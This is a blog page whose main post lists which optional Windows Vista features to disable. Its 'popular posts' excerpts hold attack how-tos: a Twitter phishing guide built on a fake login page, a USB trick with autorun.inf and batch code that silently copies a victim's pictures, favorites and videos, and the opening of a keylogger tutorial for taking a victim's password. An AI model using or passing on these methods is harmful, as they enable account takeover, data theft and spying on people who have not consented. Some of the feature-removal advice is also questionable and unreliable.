Skip to main content

Remove Optional and Probably Unnecessary Windows Vista Components

In the never-ending quest to rid your computer of unnecessary bloat, Windows Vista has a lot less options than prior versions, but you can still get rid of some of the extra Windows components that you don't need.
Open up Control Panel and go to the Programs and Features section. Find the link for "Turn Windows features on or off" (or you could just search for it)

  This dialog is quite self-explanatory… uncheck the things you don't want, and hit the OK button. Depending on the version of Vista you are running you might not see everything in the list.

  Guidelines, Not Set In Stone
Just to get you started, here's a few tips on what an average user might want to enable or disable. The rules will be different for everybody, depending on your applications and needs, so don't take these as absolute.

ActiveX Installer Service No Do you really want anything to do with ActiveX?
Games Why Not Your productivity can only increase with Spider Solitaire on your computer.
Indexing Service No This is the old indexing service that is no longer needed in Vista.
Internet Information Service No Used for hosting websites on your computer.
Microsoft .NET Framework 3.0 No Used for the new .NET 3.0 components, but only really needed for programmers.
Microsoft Message Queue (MSMQ) Server No Used by programmers as a way to reliably queue messages.
Print Services No You only need this if you use internet printers and like to kill trees. Our rainforests are depending on you disabling this service.
Remote Differential Compression Maybe This is likely required for utilities that use the network to download files. If it is enabled, don't mess with it.
Removable Storage Management No The only reason you'd need this is if you are restoring from old NTBACKUP files.
RIP Listener No You won't need this, it's a routing protocol.
Services for NFS No This can be used to map a drive to a linux NFS server. Unlikely you'd need it since Samba works so well.
SNMP Feature No This is used for management systems in workplace networks. You don't need it.
Subsystem for UNIX-based Applications No This is used for compatibility with certain applications based on UNIX… you don't need it.
Tablet PC Optional Components Maybe If you have a Tablet PC, you should enable this. If you don't, you may still want to because this includes the Snipping Tool.
Telnet Client AVOID You should never use telnet. Ever.
Telnet Server AVOID You should never use telnet. Ever.
TFTP Client AVOID TFTP was used by many of the early internet worms… there's a reason it's disabled by default.
Windows DFS Replication Service No This is only really used in work environments. Don't bother with this if you are a home user.
Windows Fan and Scan No Why anybody still faxes anything is beyond me.
Windows Meeting Space No If you don't use Windows Meeting Space or the "People Near Me" feature, don't bother with this.
Windows PowerShell No PowerShell is a more advanced command line geared towards programmers and system administrators.
Windows Process Activation Service Probably This is likely required to support some .NET applications, so I wouldn't change whatever it's currently set to.
Windows Ultimate Extras Maybe If you like the extras, then enable them. (Ultimate Only)
Hopefully this will help somebody!

Comments

Popular posts from this blog

How to Hack a Twitter Account

Twitter is one of the topmost widely running social networking sites,Its alexa ranking is 14(As per now).So therefore it is largely becoming target of hackers,Many requests keep coming to me ,please tell us a way to Hack twitter accounts or How to hack twitter accounts,so therefore i today i have written a post on How to hack twitter accounts Well for this purpose i will tell you the most used method to hack twitter accounts i.e phishing How to hack twitter accounts - Phishing First of all download:   Twitter fake login page ( Latest Version ) Click Here To Download : NOTE : You will be asked to enter a password while extracting the Documents. Please Insert the password as : IHA Step 1 First extract the contents into a folder Step 2 Then edit login.php .(right click and then select edit) In that ,find (CTRL+F) ‘http://rafayhackingarticles.blogspot.com’ then change it to your destined URL but don’t forget ‘'. Now rename the script to pass.php and save it

How to steal data using your USB flash drive

Hello friends, In this tutorial we will revealed a new tweak which is illegal but sharing here for educational purpose. This post is only to demonstrate how a user can steal victim's data without any permission, as soon as the flash drive is attached to computer, the files starts to copy in flash drive without any notice. Process is very simple as we have to add only 4-5 notepad files in the flash drive. Follow the following steps :- 1. Create a notepad file with name autorun.inf nad copy the following code. [autorun] icon=drive.ico open=launch.bat action=Click OK to Run shell\open\command=launch.bat 2. Create another notepad file of name file.bat and copy the following code. @echo off :: variables /min SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y echo off %backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics” %backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites” %backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”

How to use Keyloggers – Detailed Tutorial and FAQs

Here is a DETAILED tutorial which contains every possible information that you need to know about keyloggers which includes how to use it, how it works etc. WARNING: I highly recommend that you read this post completely since every single piece of information is important. I know most of you are new to the concept of keyloggers. For some of you, this might be the first time you heard about the term “keylogger”. So to give you a clear picture and make you understand better I would like to take up this post in the form of FAQs (Frequently Asked Questions). Here we go… 1. What is a Keylogger? A keylogger (also called as spy software) is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password. 2. How Keylogger works? Once the keylogger is installed on a PC, it starts operating in the backgrou